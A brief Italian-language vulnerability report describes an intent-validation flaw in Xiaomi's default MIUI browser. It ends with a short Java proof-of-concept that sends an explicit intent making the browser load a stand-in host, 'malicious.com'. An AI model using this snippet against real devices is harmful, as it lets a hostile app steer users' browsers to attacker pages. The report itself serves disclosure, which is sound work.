
Rapporto tecnico sulla vulnerabilità critica di Xiaomi
Rapporto tecnico sulla vulnerabilità critica di Xiaomi
Riepilogo della vulnerabilità
È stata scoperta una vulnerabilità nel browser predefinito di Xiaomi (com.android.browser) su vari dispositivi MIUI. L'app non riesce a convalidare correttamente gli intent passati tramite startActivity, consentendo alle app dannose di aprire URL arbitrari o eseguire azioni non intenzionali.
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);